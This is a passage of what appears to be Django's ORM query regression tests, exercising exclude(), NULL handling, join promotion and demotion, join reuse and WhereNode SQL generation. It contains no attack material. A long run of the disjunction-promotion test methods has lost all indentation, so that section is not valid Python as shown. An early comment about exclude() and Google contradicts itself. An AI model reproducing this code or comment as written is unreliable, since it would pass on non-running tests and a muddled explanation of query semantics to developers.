        microsoft = Company.objects.get_or_create(name='Microsoft')[0]
        intel = Company.objects.get_or_create(name='Intel')[0]

        # Local helper: link employee to employer under the given title.
        def employ(employer, employee, title):
            Employment.objects.get_or_create(employee=employee, employer=employer, title=title)

        employ(oracle, alex, 'Engineer')
        employ(oracle, alex, 'Developer')
        employ(google, alex, 'Engineer')
        employ(google, alex, 'Manager')
        employ(microsoft, alex, 'Manager')
        employ(intel, alex, 'Manager')
        employ(microsoft, jane, 'Developer')
        employ(intel, jane, 'Manager')
        # filter() keeps employers where SOME employment matches ...
        alex_tech_employers = alex.employers.filter(
            employment__title__in=('Engineer', 'Developer')).distinct().order_by('name')
        self.assertQuerysetEqual(alex_tech_employers, [google, oracle], lambda x: x)
        # ... while exclude() removes employers where SOME employment matches,
        # so Google (Engineer AND Manager) appears in both results is avoided
        # -- note Google appears below because exclude targets the multi-valued
        # relation row-wise (#14511).
        alex_nontech_employers = alex.employers.exclude(
            employment__title__in=('Engineer', 'Developer')).distinct().order_by('name')
        self.assertQuerysetEqual(alex_nontech_employers, [google, intel, microsoft], lambda x: x)
class ExcludeTest17600(TestCase):
    """
    Some regressiontests for ticket #17600. Some of these likely duplicate
    other existing tests.
    """
    @classmethod
    def setUpTestData(cls):
        # Create a few Orders.
        cls.o1 = Order.objects.create(pk=1)
        cls.o2 = Order.objects.create(pk=2)
        cls.o3 = Order.objects.create(pk=3)
        # Create some OrderItems for the first order with homogeneous
        # status_id values
        cls.oi1 = OrderItem.objects.create(order=cls.o1, status=1)
        cls.oi2 = OrderItem.objects.create(order=cls.o1, status=1)
        cls.oi3 = OrderItem.objects.create(order=cls.o1, status=1)
        # Create some OrderItems for the second order with heterogeneous
        # status_id values
        cls.oi4 = OrderItem.objects.create(order=cls.o2, status=1)
        cls.oi5 = OrderItem.objects.create(order=cls.o2, status=2)
        cls.oi6 = OrderItem.objects.create(order=cls.o2, status=3)
        # Create some OrderItems for the third order with heterogeneous
        # status_id values, none of which is 1
        cls.oi7 = OrderItem.objects.create(order=cls.o3, status=2)
        cls.oi8 = OrderItem.objects.create(order=cls.o3, status=3)
        cls.oi9 = OrderItem.objects.create(order=cls.o3, status=4)

    def test_exclude_plain(self):
        """
        This should exclude Orders which have some items with status 1
        """
        self.assertQuerysetEqual(
            Order.objects.exclude(items__status=1),
            ['<Order: 3>'])

    def test_exclude_plain_distinct(self):
        """
        This should exclude Orders which have some items with status 1
        """
        self.assertQuerysetEqual(
            Order.objects.exclude(items__status=1).distinct(),
            ['<Order: 3>'])

    def test_exclude_with_q_object_distinct(self):
        """
        This should exclude Orders which have some items with status 1
        """
        self.assertQuerysetEqual(
            Order.objects.exclude(Q(items__status=1)).distinct(),
            ['<Order: 3>'])

    def test_exclude_with_q_object_no_distinct(self):
        """
        This should exclude Orders which have some items with status 1
        """
        self.assertQuerysetEqual(
            Order.objects.exclude(Q(items__status=1)),
            ['<Order: 3>'])

    def test_exclude_with_q_is_equal_to_plain_exclude(self):
        """
        Using exclude(condition) and exclude(Q(condition)) should
        yield the same QuerySet
        """
        self.assertEqual(
            list(Order.objects.exclude(items__status=1).distinct()),
            list(Order.objects.exclude(Q(items__status=1)).distinct()))

    def test_exclude_with_q_is_equal_to_plain_exclude_variation(self):
        """
        Using exclude(condition) and exclude(Q(condition)) should
        yield the same QuerySet
        """
        self.assertEqual(
            list(Order.objects.exclude(items__status=1)),
            list(Order.objects.exclude(Q(items__status=1)).distinct()))

    @unittest.expectedFailure
    def test_only_orders_with_all_items_having_status_1(self):
        """
        This should only return orders having ALL items set to status 1, or
        those items not having any orders at all. The correct way to write
        this query in SQL seems to be using two nested subqueries.
        """
        self.assertQuerysetEqual(
            Order.objects.exclude(~Q(items__status=1)).distinct(),
            ['<Order: 1>'])
class Exclude15786(TestCase):
    """Regression test for #15786"""

    def test_ticket15786(self):
        first, second = (SimpleCategory.objects.create(name=n) for n in ('c1', 'c2'))
        for category in (first, second):
            OneToOneCategory.objects.create(category=category)
        rel = CategoryRelationship.objects.create(first=first, second=second)
        # Excluding rows whose two sides share the same one-to-one category
        # must keep this relationship (its sides differ).
        self.assertEqual(
            CategoryRelationship.objects.exclude(
                first__onetoonecategory=F('second__onetoonecategory')
            ).get(),
            rel,
        )
class NullInExcludeTest(TestCase):
    """exclude(field__in=...) behavior when some rows have a NULL field."""

    @classmethod
    def setUpTestData(cls):
        NullableName.objects.create(name='i1')
        # A row with name left as NULL.
        NullableName.objects.create()

    def test_null_in_exclude_qs(self):
        # On backends that store '' as NULL (Oracle), the "null" name comes
        # back as '' instead of None.
        none_val = '' if connection.features.interprets_empty_strings_as_nulls else None
        self.assertQuerysetEqual(
            NullableName.objects.exclude(name__in=[]),
            ['i1', none_val], attrgetter('name'))
        self.assertQuerysetEqual(
            NullableName.objects.exclude(name__in=['i1']),
            [none_val], attrgetter('name'))
        self.assertQuerysetEqual(
            NullableName.objects.exclude(name__in=['i3']),
            ['i1', none_val], attrgetter('name'))
        inner_qs = NullableName.objects.filter(name='i1').values_list('name')
        self.assertQuerysetEqual(
            NullableName.objects.exclude(name__in=inner_qs),
            [none_val], attrgetter('name'))
        # Check that the inner queryset wasn't executed - it should be turned
        # into subquery above
        self.assertIs(inner_qs._result_cache, None)

    @unittest.expectedFailure
    def test_col_not_in_list_containing_null(self):
        """
        The following case is not handled properly because
        SQL's COL NOT IN (list containing null) handling is too weird to
        abstract away.
        """
        self.assertQuerysetEqual(
            NullableName.objects.exclude(name__in=[None]),
            ['i1'], attrgetter('name'))

    def test_double_exclude(self):
        # Double negation must cancel out, both in results ...
        self.assertEqual(
            list(NullableName.objects.filter(~~Q(name='i1'))),
            list(NullableName.objects.filter(Q(name='i1'))))
        # ... and in the generated SQL (no stray IS NOT NULL check).
        self.assertNotIn(
            'IS NOT NULL',
            str(NullableName.objects.filter(~~Q(name='i1')).query))
class EmptyStringsAsNullTest(TestCase):
    """
    Test that filtering on non-null character fields works as expected.
    The reason for these tests is that Oracle treats '' as NULL, and this
    can cause problems in query construction. Refs #17957.
    """
    @classmethod
    def setUpTestData(cls):
        # A category whose name is the empty string.
        cls.nc = NamedCategory.objects.create(name='')

    def test_direct_exclude(self):
        qs = NamedCategory.objects.exclude(name__in=['nonexisting'])
        self.assertQuerysetEqual(qs, [self.nc.pk], attrgetter('pk'))

    def test_joined_exclude(self):
        qs = DumbCategory.objects.exclude(namedcategory__name__in=['nonexisting'])
        self.assertQuerysetEqual(qs, [self.nc.pk], attrgetter('pk'))

    def test_21001(self):
        foo = NamedCategory.objects.create(name='foo')
        qs = NamedCategory.objects.exclude(name='')
        self.assertQuerysetEqual(qs, [foo.pk], attrgetter('pk'))
class ProxyQueryCleanupTest(TestCase):
    def test_evaluated_proxy_count(self):
        """
        Test that generating the query string doesn't alter the query's state
        in irreversible ways. Refs #18248.
        """
        ProxyCategory.objects.create()
        qs = ProxyCategory.objects.all()
        # Count, render the SQL, then count again: both counts must be 1.
        before = qs.count()
        str(qs.query)
        after = qs.count()
        self.assertEqual(before, 1)
        self.assertEqual(after, 1)
class WhereNodeTest(TestCase):
    """White-box tests for WhereNode SQL generation with empty/full children."""

    class DummyNode(object):
        # Minimal node that always compiles to the SQL literal 'dummy'.
        def as_sql(self, compiler, connection):
            return 'dummy', []

    class MockCompiler(object):
        # Just enough of the SQLCompiler interface for WhereNode.as_sql().
        def compile(self, node):
            return node.as_sql(self, connection)

        def __call__(self, name):
            return connection.ops.quote_name(name)

    def test_empty_full_handling_conjunction(self):
        compiler = WhereNodeTest.MockCompiler()
        # A NothingNode in an AND makes the whole node match nothing ...
        w = WhereNode(children=[NothingNode()])
        self.assertRaises(EmptyResultSet, w.as_sql, compiler, connection)
        # ... and negating "nothing" matches everything: empty WHERE clause.
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
        w = WhereNode(children=[self.DummyNode(), self.DummyNode()])
        self.assertEqual(w.as_sql(compiler, connection), ('(dummy AND dummy)', []))
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy AND dummy)', []))
        # Mixing a NothingNode into an AND still yields the empty result set.
        w = WhereNode(children=[NothingNode(), self.DummyNode()])
        self.assertRaises(EmptyResultSet, w.as_sql, compiler, connection)
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('', []))

    def test_empty_full_handling_disjunction(self):
        compiler = WhereNodeTest.MockCompiler()
        w = WhereNode(children=[NothingNode()], connector='OR')
        self.assertRaises(EmptyResultSet, w.as_sql, compiler, connection)
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
        w = WhereNode(children=[self.DummyNode(), self.DummyNode()], connector='OR')
        self.assertEqual(w.as_sql(compiler, connection), ('(dummy OR dummy)', []))
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy OR dummy)', []))
        # In an OR, a NothingNode is simply dropped from the generated SQL.
        w = WhereNode(children=[NothingNode(), self.DummyNode()], connector='OR')
        self.assertEqual(w.as_sql(compiler, connection), ('dummy', []))
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('NOT (dummy)', []))

    def test_empty_nodes(self):
        compiler = WhereNodeTest.MockCompiler()
        empty_w = WhereNode()
        # Childless nodes generate no SQL (match everything) ...
        w = WhereNode(children=[empty_w, empty_w])
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
        # ... so their negation matches nothing.
        w.negate()
        with self.assertRaises(EmptyResultSet):
            w.as_sql(compiler, connection)
        w.connector = 'OR'
        with self.assertRaises(EmptyResultSet):
            w.as_sql(compiler, connection)
        w.negate()
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
        # full OR nothing == full; full AND nothing == nothing.
        w = WhereNode(children=[empty_w, NothingNode()], connector='OR')
        self.assertEqual(w.as_sql(compiler, connection), ('', []))
        w = WhereNode(children=[empty_w, NothingNode()], connector='AND')
        with self.assertRaises(EmptyResultSet):
            w.as_sql(compiler, connection)
class IteratorExceptionsTest(TestCase):
    def test_iter_exceptions(self):
        # Evaluating this only() queryset must raise AttributeError.
        qs = ExtraInfo.objects.only('author')
        with self.assertRaises(AttributeError):
            list(qs)

    def test_invalid_qs_list(self):
        """
        #19895 -- iterating an invalid queryset a second time raises the
        same error rather than silently yielding stale results.
        """
        qs = Article.objects.order_by('invalid_column')
        for _ in range(2):
            with self.assertRaises(FieldError):
                list(qs)
class NullJoinPromotionOrTest(TestCase):
    """
    Promotion (INNER -> LEFT OUTER) and demotion of joins over nullable
    relations when filters are ORed, negated or double-negated.
    """

    @classmethod
    def setUpTestData(cls):
        # a1 has only a D; a2 has both a B (with C) and a D.
        cls.d1 = ModelD.objects.create(name='foo')
        d2 = ModelD.objects.create(name='bar')
        cls.a1 = ModelA.objects.create(name='a1', d=cls.d1)
        c = ModelC.objects.create(name='c')
        b = ModelB.objects.create(name='b', c=c)
        cls.a2 = ModelA.objects.create(name='a2', b=b, d=d2)

    def test_ticket_17886(self):
        # The first Q-object is generating the match, the rest of the filters
        # should not remove the match even if they do not match anything. The
        # problem here was that b__name generates a LOUTER JOIN, then
        # b__c__name generates join to c, which the ORM tried to promote but
        # failed as that join isn't nullable.
        q_obj = (
            Q(d__name='foo') |
            Q(b__name='foo') |
            Q(b__c__name='foo')
        )
        qset = ModelA.objects.filter(q_obj)
        self.assertEqual(list(qset), [self.a1])
        # We generate one INNER JOIN to D. The join is direct and not nullable
        # so we can use INNER JOIN for it. However, we can NOT use INNER JOIN
        # for the b->c join, as a->b is nullable.
        self.assertEqual(str(qset.query).count('INNER JOIN'), 1)

    def test_isnull_filter_promotion(self):
        # isnull=True needs the NULL rows, so the join must be LEFT OUTER.
        qs = ModelA.objects.filter(Q(b__name__isnull=True))
        self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
        self.assertEqual(list(qs), [self.a1])
        # Negation flips the requirement: matching rows must exist -> INNER.
        qs = ModelA.objects.filter(~Q(b__name__isnull=True))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(list(qs), [self.a2])
        # Double negation cancels out.
        qs = ModelA.objects.filter(~~Q(b__name__isnull=True))
        self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
        self.assertEqual(list(qs), [self.a1])
        qs = ModelA.objects.filter(Q(b__name__isnull=False))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(list(qs), [self.a2])
        qs = ModelA.objects.filter(~Q(b__name__isnull=False))
        self.assertEqual(str(qs.query).count('LEFT OUTER'), 1)
        self.assertEqual(list(qs), [self.a1])
        qs = ModelA.objects.filter(~~Q(b__name__isnull=False))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(list(qs), [self.a2])

    def test_null_join_demotion(self):
        # ANDing isnull=False with anything else lets the join stay INNER;
        # ORing the two conditions requires LEFT OUTER.
        qs = ModelA.objects.filter(Q(b__name__isnull=False) & Q(b__name__isnull=True))
        self.assertIn(' INNER JOIN ', str(qs.query))
        qs = ModelA.objects.filter(Q(b__name__isnull=True) & Q(b__name__isnull=False))
        self.assertIn(' INNER JOIN ', str(qs.query))
        qs = ModelA.objects.filter(Q(b__name__isnull=False) | Q(b__name__isnull=True))
        self.assertIn(' LEFT OUTER JOIN ', str(qs.query))
        qs = ModelA.objects.filter(Q(b__name__isnull=True) | Q(b__name__isnull=False))
        self.assertIn(' LEFT OUTER JOIN ', str(qs.query))

    def test_ticket_21366(self):
        n = Note.objects.create(note='n', misc='m')
        e = ExtraInfo.objects.create(info='info', note=n)
        a = Author.objects.create(name='Author1', num=1, extra=e)
        Ranking.objects.create(rank=1, author=a)
        r1 = Report.objects.create(name='Foo', creator=a)
        r2 = Report.objects.create(name='Bar')
        Report.objects.create(name='Bar', creator=a)
        qs = Report.objects.filter(
            Q(creator__ranking__isnull=True) |
            Q(creator__ranking__rank=1, name='Foo')
        )
        # Both joins (creator, ranking) must be LEFT OUTER, and no others.
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
        self.assertEqual(str(qs.query).count(' JOIN '), 2)
        self.assertQuerysetEqual(
            qs.order_by('name'), [r2, r1], lambda x: x)

    def test_ticket_21748(self):
        i1 = Identifier.objects.create(name='i1')
        i2 = Identifier.objects.create(name='i2')
        i3 = Identifier.objects.create(name='i3')
        Program.objects.create(identifier=i1)
        Channel.objects.create(identifier=i1)
        Program.objects.create(identifier=i2)
        self.assertQuerysetEqual(
            Identifier.objects.filter(program=None, channel=None),
            [i3], lambda x: x)
        self.assertQuerysetEqual(
            Identifier.objects.exclude(program=None, channel=None).order_by('name'),
            [i1, i2], lambda x: x)

    def test_ticket_21748_double_negated_and(self):
        i1 = Identifier.objects.create(name='i1')
        i2 = Identifier.objects.create(name='i2')
        Identifier.objects.create(name='i3')
        p1 = Program.objects.create(identifier=i1)
        c1 = Channel.objects.create(identifier=i1)
        Program.objects.create(identifier=i2)
        # Check the ~~Q() (or equivalently .exclude(~Q)) works like Q() for
        # join promotion.
        qs1_doubleneg = Identifier.objects.exclude(~Q(program__id=p1.id, channel__id=c1.id)).order_by('pk')
        qs1_filter = Identifier.objects.filter(program__id=p1.id, channel__id=c1.id).order_by('pk')
        self.assertQuerysetEqual(qs1_doubleneg, qs1_filter, lambda x: x)
        self.assertEqual(str(qs1_filter.query).count('JOIN'),
                         str(qs1_doubleneg.query).count('JOIN'))
        self.assertEqual(2, str(qs1_doubleneg.query).count('INNER JOIN'))
        self.assertEqual(str(qs1_filter.query).count('INNER JOIN'),
                         str(qs1_doubleneg.query).count('INNER JOIN'))

    def test_ticket_21748_double_negated_or(self):
        i1 = Identifier.objects.create(name='i1')
        i2 = Identifier.objects.create(name='i2')
        Identifier.objects.create(name='i3')
        p1 = Program.objects.create(identifier=i1)
        c1 = Channel.objects.create(identifier=i1)
        p2 = Program.objects.create(identifier=i2)
        # Test OR + doubleneg. The expected result is that channel is LOUTER
        # joined, program INNER joined
        qs1_filter = Identifier.objects.filter(
            Q(program__id=p2.id, channel__id=c1.id)
            | Q(program__id=p1.id)
        ).order_by('pk')
        qs1_doubleneg = Identifier.objects.exclude(
            ~Q(Q(program__id=p2.id, channel__id=c1.id)
               | Q(program__id=p1.id))
        ).order_by('pk')
        self.assertQuerysetEqual(qs1_doubleneg, qs1_filter, lambda x: x)
        self.assertEqual(str(qs1_filter.query).count('JOIN'),
                         str(qs1_doubleneg.query).count('JOIN'))
        self.assertEqual(1, str(qs1_doubleneg.query).count('INNER JOIN'))
        self.assertEqual(str(qs1_filter.query).count('INNER JOIN'),
                         str(qs1_doubleneg.query).count('INNER JOIN'))

    def test_ticket_21748_complex_filter(self):
        i1 = Identifier.objects.create(name='i1')
        i2 = Identifier.objects.create(name='i2')
        Identifier.objects.create(name='i3')
        p1 = Program.objects.create(identifier=i1)
        c1 = Channel.objects.create(identifier=i1)
        p2 = Program.objects.create(identifier=i2)
        # Finally, a more complex case, one time in a way where each
        # NOT is pushed to lowest level in the boolean tree, and
        # another query where this isn't done.
        qs1 = Identifier.objects.filter(
            ~Q(~Q(program__id=p2.id, channel__id=c1.id)
               & Q(program__id=p1.id))).order_by('pk')
        qs2 = Identifier.objects.filter(
            Q(Q(program__id=p2.id, channel__id=c1.id)
              | ~Q(program__id=p1.id))).order_by('pk')
        self.assertQuerysetEqual(qs1, qs2, lambda x: x)
        self.assertEqual(str(qs1.query).count('JOIN'),
                         str(qs2.query).count('JOIN'))
        self.assertEqual(0, str(qs1.query).count('INNER JOIN'))
        self.assertEqual(str(qs1.query).count('INNER JOIN'),
                         str(qs2.query).count('INNER JOIN'))
class ReverseJoinTrimmingTest(TestCase):
    def test_reverse_trimming(self):
        # Reverse joins must never be trimmed away: we can't know whether
        # anything exists on the other side of the join, so dropping it
        # could change the result set.
        tag = Tag.objects.create()
        queryset = Tag.objects.filter(annotation__tag=tag.pk)
        self.assertIn('INNER JOIN', str(queryset.query))
        self.assertEqual(list(queryset), [])
class JoinReuseTest(TestCase):
    """
    Test that the queries reuse joins sensibly (for example, direct joins
    are always reused).
    """

    def assertJoinCount(self, queryset, expected):
        # The number of JOIN clauses in the generated SQL reveals whether
        # joins were shared or duplicated.
        self.assertEqual(str(queryset.query).count('JOIN'), expected)

    def test_fk_reuse(self):
        self.assertJoinCount(
            Annotation.objects.filter(tag__name='foo').filter(tag__name='bar'), 1)

    def test_fk_reuse_select_related(self):
        self.assertJoinCount(
            Annotation.objects.filter(tag__name='foo').select_related('tag'), 1)

    def test_fk_reuse_annotation(self):
        self.assertJoinCount(
            Annotation.objects.filter(tag__name='foo').annotate(cnt=Count('tag__name')), 1)

    def test_fk_reuse_disjunction(self):
        self.assertJoinCount(
            Annotation.objects.filter(Q(tag__name='foo') | Q(tag__name='bar')), 1)

    def test_fk_reuse_order_by(self):
        self.assertJoinCount(
            Annotation.objects.filter(tag__name='foo').order_by('tag__name'), 1)

    def test_revo2o_reuse(self):
        # A reverse one-to-one join is single-valued, so it can be reused.
        self.assertJoinCount(
            Detail.objects.filter(member__name='foo').filter(member__name='foo'), 1)

    def test_revfk_noreuse(self):
        # A reverse FK is multi-valued: each filter() call needs its own join.
        self.assertJoinCount(
            Author.objects.filter(report__name='r4').filter(report__name='r1'), 2)
class DisjunctionPromotionTests(TestCase):
    def test_disjuction_promotion_select_related(self):
        # ORed lookups against two relations combined with select_related():
        # both relations must become LEFT OUTER joins.
        fk1 = FK1.objects.create(f1='f1', f2='f2')
        basea = BaseA.objects.create(a=fk1)
        qs = BaseA.objects.filter(Q(a=fk1) | Q(b=2))
        # The bare filter compares FK columns directly -- no joins at all.
        self.assertEqual(str(qs.query).count(' JOIN '), 0)
        qs = qs.select_related('a', 'b')
        self.assertEqual(str(qs.query).count(' INNER JOIN '), 0)
        self.assertEqual(str(qs.query).count(' LEFT OUTER JOIN '), 2)
        # One query fetches the row plus both related objects (b is NULL).
        with self.assertNumQueries(1):
            self.assertQuerysetEqual(qs, [basea], lambda x: x)
            self.assertEqual(qs[0].a, fk1)
            self.assertIs(qs[0].b, None)
def test_disjunction_promotion1(self):
# Pre-existing join, add two ORed filters to the same join,
# all joins can be INNER JOINS.
qs = BaseA.objects.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = qs.filter(Q(b__f1='foo') | Q(b__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
# Reverse the order of AND and OR filters.
qs = BaseA.objects.filter(Q(b__f1='foo') | Q(b__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = qs.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
def test_disjunction_promotion2(self):
qs = BaseA.objects.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
# Now we have two different joins in an ORed condition, these
# must be OUTER joins. The pre-existing join should remain INNER.
qs = qs.filter(Q(b__f1='foo') | Q(c__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
# Reverse case.
qs = BaseA.objects.filter(Q(b__f1='foo') | Q(c__f2='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
qs = qs.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
def test_disjunction_promotion3(self):
qs = BaseA.objects.filter(a__f2='bar')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
# The ANDed a__f2 filter allows us to use keep using INNER JOIN
# even inside the ORed case. If the join to a__ returns nothing,
# the ANDed filter for a__f2 can't be true.
qs = qs.filter(Q(a__f1='foo') | Q(b__f2='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
def test_disjunction_promotion3_demote(self):
# This one needs demotion logic: the first filter causes a to be
# outer joined, the second filter makes it inner join again.
qs = BaseA.objects.filter(
Q(a__f1='foo') | Q(b__f2='foo')).filter(a__f2='bar')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
def test_disjunction_promotion4_demote(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('JOIN'), 0)
# Demote needed for the "a" join. It is marked as outer join by
# above filter (even if it is trimmed away).
qs = qs.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
def test_disjunction_promotion4(self):
qs = BaseA.objects.filter(a__f1='foo')
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = qs.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
def test_disjunction_promotion5_demote(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
# Note that the above filters on a force the join to an
# inner join even if it is trimmed.
self.assertEqual(str(qs.query).count('JOIN'), 0)
qs = qs.filter(Q(a__f1='foo') | Q(b__f1='foo'))
# So, now the a__f1 join doesn't need promotion.
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
# But b__f1 does.
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
qs = BaseA.objects.filter(Q(a__f1='foo') | Q(b__f1='foo'))
# Now the join to a is created as LOUTER
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
qs = qs.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
def test_disjunction_promotion6(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('JOIN'), 0)
qs = BaseA.objects.filter(Q(a__f1='foo') & Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
qs = BaseA.objects.filter(Q(a__f1='foo') & Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
qs = qs.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
def test_disjunction_promotion7(self):
qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
self.assertEqual(str(qs.query).count('JOIN'), 0)
qs = BaseA.objects.filter(Q(a__f1='foo') | (Q(b__f1='foo') & Q(a__f1='bar')))
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
qs = BaseA.objects.filter(
(Q(a__f1='foo') | Q(b__f1='foo')) & (Q(a__f1='bar') | Q(c__f1='foo'))
)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
self.assertEqual(str(qs.query).count('INNER JOIN'), 0)
qs = BaseA.objects.filter(
(Q(a__f1='foo') | (Q(a__f1='bar')) & (Q(b__f1='bar') | Q(c__f1='foo')))
)
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
def test_disjunction_promotion_fexpression(self):
qs = BaseA.objects.filter(Q(a__f1=F('b__f1')) | Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
qs = BaseA.objects.filter(Q(a__f1=F('c__f1')) | Q(b__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
qs = BaseA.objects.filter(Q(a__f1=F('b__f1')) | Q(a__f2=F('b__f2')) | Q(c__f1='foo'))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
qs = BaseA.objects.filter(Q(a__f1=F('c__f1')) | (Q(pk=1) & Q(pk=2)))
self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
self.assertEqual(str(qs.query).count('INNER JOIN'), 0)
class ManyToManyExcludeTest(TestCase):
    """exclude() across many-to-many relations (and #12823 regression)."""

    def test_exclude_many_to_many(self):
        Identifier.objects.create(name='extra')
        program = Program.objects.create(identifier=Identifier.objects.create(name='program'))
        channel = Channel.objects.create(identifier=Identifier.objects.create(name='channel'))
        channel.programs.add(program)
        # channel contains 'program1', so all Identifiers except that one
        # should be returned
        self.assertQuerysetEqual(
            Identifier.objects.exclude(program__channel=channel).order_by('name'),
            ['<Identifier: channel>', '<Identifier: extra>']
        )
        # Excluding None keeps only identifiers whose program IS in some
        # channel.
        self.assertQuerysetEqual(
            Identifier.objects.exclude(program__channel=None).order_by('name'),
            ['<Identifier: program>']
        )

    def test_ticket_12823(self):
        # Excluding through a chain of relations must use a subquery, not
        # an "IS NOT NULL" outer-join trick (#12823).
        pg3 = Page.objects.create(text='pg3')
        pg2 = Page.objects.create(text='pg2')
        pg1 = Page.objects.create(text='pg1')
        pa1 = Paragraph.objects.create(text='pa1')
        pa1.page = [pg1, pg2]
        pa2 = Paragraph.objects.create(text='pa2')
        pa2.page = [pg2, pg3]
        pa3 = Paragraph.objects.create(text='pa3')
        ch1 = Chapter.objects.create(title='ch1', paragraph=pa1)
        ch2 = Chapter.objects.create(title='ch2', paragraph=pa2)
        ch3 = Chapter.objects.create(title='ch3', paragraph=pa3)
        b1 = Book.objects.create(title='b1', chapter=ch1)
        b2 = Book.objects.create(title='b2', chapter=ch2)
        b3 = Book.objects.create(title='b3', chapter=ch3)
        q = Book.objects.exclude(chapter__paragraph__page__text='pg1')
        self.assertNotIn('IS NOT NULL', str(q.query))
        self.assertEqual(len(q), 2)
        self.assertNotIn(b1, q)
        self.assertIn(b2, q)
        self.assertIn(b3, q)
class RelabelCloneTest(TestCase):
    """Regression test for #19964: alias relabeling when cloning queries."""

    def test_ticket_19964(self):
        root = MyObject.objects.create(data='foo')
        root.parent = root
        root.save()
        child = MyObject.objects.create(data='bar', parent=root)

        parents = MyObject.objects.filter(parent=F('id'))
        children = MyObject.objects.filter(parent__in=parents).exclude(parent=F('id'))

        self.assertEqual(list(parents), [root])
        # Evaluating the children query (which has parents as part of it) does
        # not change results for the parents query.
        self.assertEqual(list(children), [child])
        self.assertEqual(list(parents), [root])
class Ticket20101Tests(TestCase):
    def test_ticket_20101(self):
        """
        Tests QuerySet ORed combining in exclude subquery case.
        """
        t = Tag.objects.create(name='foo')
        a1 = Annotation.objects.create(tag=t, name='a1')
        a2 = Annotation.objects.create(tag=t, name='a2')
        a3 = Annotation.objects.create(tag=t, name='a3')
        n = Note.objects.create(note='foo', misc='bar')
        # n has no annotations: excluded-in qs1 matches it, qs2 doesn't.
        qs1 = Note.objects.exclude(annotation__in=[a1, a2])
        qs2 = Note.objects.filter(annotation__in=[a3])
        self.assertIn(n, qs1)
        self.assertNotIn(n, qs2)
        # ORing the two querysets must still include n (#20101).
        self.assertIn(n, (qs1 | qs2))
class EmptyStringPromotionTests(TestCase):
    def test_empty_string_promotion(self):
        # On backends that store '' as NULL (Oracle), filtering by the
        # empty string must promote the join to LEFT OUTER.
        qs = RelatedObject.objects.filter(single__name='')
        if connection.features.interprets_empty_strings_as_nulls:
            self.assertIn('LEFT OUTER JOIN', str(qs.query))
        else:
            self.assertNotIn('LEFT OUTER JOIN', str(qs.query))
class ValuesSubqueryTests(TestCase):
    def test_values_in_subquery(self):
        # Check that if a values() queryset is used, then the given values
        # will be used instead of forcing use of the relation's field.
        o1 = Order.objects.create(id=-2)
        o2 = Order.objects.create(id=-1)
        oi1 = OrderItem.objects.create(order=o1, status=0)
        oi1.status = oi1.pk
        oi1.save()
        OrderItem.objects.create(order=o2, status=0)
        # The query below should match o1 as it has related order_item
